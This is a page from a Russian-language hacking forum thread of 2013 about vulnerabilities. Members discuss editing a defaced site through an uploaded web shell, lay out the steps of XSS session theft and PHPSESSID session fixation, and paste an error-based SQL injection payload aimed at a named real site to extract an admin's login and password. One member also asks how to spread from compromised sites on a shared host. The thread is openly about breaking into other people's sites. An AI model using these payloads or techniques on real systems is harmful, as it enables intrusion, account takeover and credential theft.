HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2189 из 2422 « Первая < 11891689208921392179 2185 2186 2187 2188 2189 2190 2191 2192 2193 219922392289 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.03.2013, 19:11
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
посмотри с другово браузера этот же сайт, или просто очисти кеш
 
Ответить с цитированием

  #2  
Старый 12.03.2013, 19:36
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от OxoTnik  
OxoTnik said:
посмотри с другово браузера этот же сайт, или просто очисти кеш
та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку
 
Ответить с цитированием

  #3  
Старый 12.03.2013, 23:26
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.

По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
 
Ответить с цитированием

  #4  
Старый 12.03.2013, 23:52
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Cennarios  
Cennarios said:
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
чего ты так рагорячился)) мы же не такие про как ты))

глянул пхп инфо, есть там apc, как там обнулить кеш?
 
Ответить с цитированием

  #5  
Старый 13.03.2013, 00:23
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.
 
Ответить с цитированием

  #6  
Старый 13.03.2013, 00:39
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Как пользоваться PHPSESSID session fixation дайте ссылку на топ
 
Ответить с цитированием

  #7  
Старый 13.03.2013, 03:02
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от Groove  
Groove said:
Как пользоваться
PHPSESSID session fixation
дайте ссылку на топ
Возможный путь использования XSS:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Нахождение XSS

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Впаривание XSS

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Получение PHPSESSID

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Заход под PHPSESSID

[/COLOR][/COLOR
PHPSESSID session fixation:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Создание своего уже[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]известного PHPSESSID

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Установка этого PHPSESSID у удаленого человека[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Впаривание[/COLOR][COLOR="#007700"])

-[/COLOR][COLOR="#0000BB"]Он авторизуется по этим PHPSESSID

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Мы заходим под уже известным PHPSESSID

[/COLOR][/COLOR
Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.

Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.

http://www.acros.si/papers/session_fixation.pdf
 
Ответить с цитированием

  #8  
Старый 13.03.2013, 13:41
panfilov1991
Guest
Сообщений: n/a
Провел на форуме:
6020

Репутация: 0
По умолчанию
отправляю запрос на сервер

Цитата:
Сообщение от None  
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
Выдает :

Цитата:
Сообщение от None  
Table 'panel.users' doesn't exist
Сайт

Цитата:
Сообщение от None  
http://game.parlahost.ru/
 
Ответить с цитированием

  #9  
Старый 13.03.2013, 20:38
panfilov1991
Guest
Сообщений: n/a
Провел на форуме:
6020

Репутация: 0
По умолчанию
Цитата:
Сообщение от panfilov1991  
panfilov1991 said:
отправляю запрос на сервер
Выдает :
Сайт
Нужно вывести лог и пасс админа
 
Ответить с цитированием

  #10  
Старый 14.03.2013, 17:16
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:

можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
 
Ответить с цитированием
Ответ
Страница 2189 из 2422 « Первая < 11891689208921392179 2185 2186 2187 2188 2189 2190 2191 2192 2193 219922392289 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ